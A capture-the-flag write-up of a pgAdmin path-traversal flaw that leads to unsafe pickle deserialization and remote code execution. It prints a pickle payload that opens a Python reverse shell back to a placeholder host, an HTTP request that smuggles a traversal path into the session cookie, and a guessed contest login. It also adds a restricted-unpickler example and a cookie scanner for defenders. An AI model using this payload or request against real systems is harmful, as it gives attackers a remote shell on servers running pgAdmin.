NKCTF
Link to the detailed CVE reproduction write-up:
https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
I also found this article during the competition, but at the time the nc and sh reverse shells failed, which was infuriating and baffling, so after the competition I went back over why it had failed.
Solution: spawn the reverse shell with a python shell command (thanks to the challenge author seizer, and thanks to master Chenxi for the pointers;
-> Chenxi's blog: https://chenxi9981.github.io/
Reproduction steps
That article mentions that on Linux you must have an account and password.
The competition used a Linux environment.
The competition login account was: tacooooo@qq.com
The password, guessed, was: tacooooo
This competition reinforced for me that the password is not necessarily a weak one; it may well be related to the challenge author.
Log in
Following the hint, the next step is to upload a file.
The python file needed to produce the upload is as follows.
exp:

```python
import pickle
import os
import pickletools


class exp():
    # pickle calls __reduce__ when serializing; the tuple it returns
    # (callable, args) is what the unpickler will call on load.
    def __reduce__(self):
        return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);",))


if __name__ == '__main__':
    c = exp()
    payload = pickle.dumps(c)
    # write the serialized object to the file that will be uploaded
    with open('posix.pickle', 'wb') as f:
        f.write(payload)
```

This py file generates the posix.pickle file.
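An added defensive illustration, written for this post and not taken from the writeup or from pgAdmin: the RCE sink is the unpickling of attacker-controlled bytes, because any global a pickle names is resolved and called on load. The constructed `Probe` class stands in for the exp above with a harmless callable; an Unpickler whose `find_class` refuses every lookup still loads a plain-data pickle but rejects the probe, while `pickle.loads` runs it.

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup, so a pickle cannot resolve exec, os, etc."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data):
    """Deserialize with the restricted unpickler instead of pickle.loads."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    # Constructed, harmless stand-in for the exp class above: its reduce
    # asks the unpickler to resolve the global builtins.len and call it.
    def __reduce__(self):
        return (len, ("probe",))


def demo():
    # Constructed sample data: what a legitimate session blob might hold.
    benign = pickle.dumps({"tree_state": {"expanded": ["server_1"]}})
    probe = pickle.dumps(Probe())
    results = {}
    results["benign"] = safe_loads(benign)        # plain data loads fine
    try:
        safe_loads(probe)
        results["probe"] = "executed"
    except pickle.UnpicklingError:
        results["probe"] = "blocked"               # global lookup refused
    results["unsafe"] = pickle.loads(probe)        # the sink: len("probe") runs
    return results


if __name__ == "__main__":
    print(demo())
```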
Upload
Capture the request and modify the cookie.
If the reverse shell succeeds the request does not get a response, so a hanging request at this point means the shell has connected back.
Get the flag:
POC:
```http
POST /settings/save_tree_state/ HTTP/1.1
Host: 3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn
Content-Length: 2
X-pgA-CSRFToken: IjE0MGE3MTVmMmIzMDgwYmYwOTJmNGU5ZjUyOWJlNTQ1OTcwZTdhNDki.ZgGgmA.YDRgzezGzIulLQT1YgWn_A7Bv5c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Content-type: application/json
Accept: */*
Origin: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn
Referer: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn/browser/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=en
Connection: close

{}
```
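An added detection example, written for this post rather than taken from the writeup or from pgAdmin: the request above abuses the `pga4_session` cookie, whose value has the shape `<session_id>!<signature>`, by putting a relative path in place of the session id. The scanner below parses that cookie out of constructed request lines, URL-decodes it, and flags any session id that contains traversal sequences or path separators; the assumption that a legitimate id is an opaque `[A-Za-z0-9_-]` token is mine, not documented on the page.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not real traffic): method, path and the
# Cookie header, as a defender might extract them from a reverse-proxy log.
SAMPLE_REQUESTS = [
    "POST /settings/save_tree_state/ cookie=pga4_session=a1b2c3d4e5f6!Zm9vYmFy; PGADMIN_LANGUAGE=en",
    "POST /settings/save_tree_state/ cookie=pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=en",
    "GET /browser/ cookie=pga4_session=..%2Fstorage%2Fuser_example.com%2Fx.pickle!a",
    "GET /login cookie=PGADMIN_LANGUAGE=en",
]

COOKIE_RE = re.compile(r"pga4_session=([^;\s]+)")
# Assumption: a legitimate session id is an opaque token without separators.
SAFE_SID_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def parse_session_cookie(line):
    """Return the raw pga4_session value from a request line, or None."""
    m = COOKIE_RE.search(line)
    return m.group(1) if m else None


def classify_session_value(value):
    """Classify a pga4_session value as 'ok', 'traversal' or 'malformed'."""
    decoded = unquote(unquote(value))      # tolerate single/double URL encoding
    sid, sep, _sig = decoded.partition("!")
    if not sep:
        return "malformed"                 # expected <session_id>!<signature>
    if ".." in sid or "/" in sid or "\\" in sid:
        return "traversal"                 # path in place of a session id
    if not SAFE_SID_RE.match(sid):
        return "malformed"
    return "ok"


def scan(lines):
    """Return (verdict, raw_value) for every request whose cookie is suspect."""
    findings = []
    for line in lines:
        value = parse_session_cookie(line)
        if value is None:
            continue
        verdict = classify_session_value(value)
        if verdict != "ok":
            findings.append((verdict, value))
    return findings


if __name__ == "__main__":
    for verdict, value in scan(SAMPLE_REQUESTS):
        print(f"{verdict}: {value}")
```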
Closing remarks
About this challenge: some players got a reverse shell with nc, but my nc reverse shells failed both during and after the competition. I also checked my VPS: nc reverse shells between different VPSes worked fine locally, but this challenge simply would not connect back. If nc does not work for you either, I suggest using the exp above to generate the payload and spawning the shell with the python command.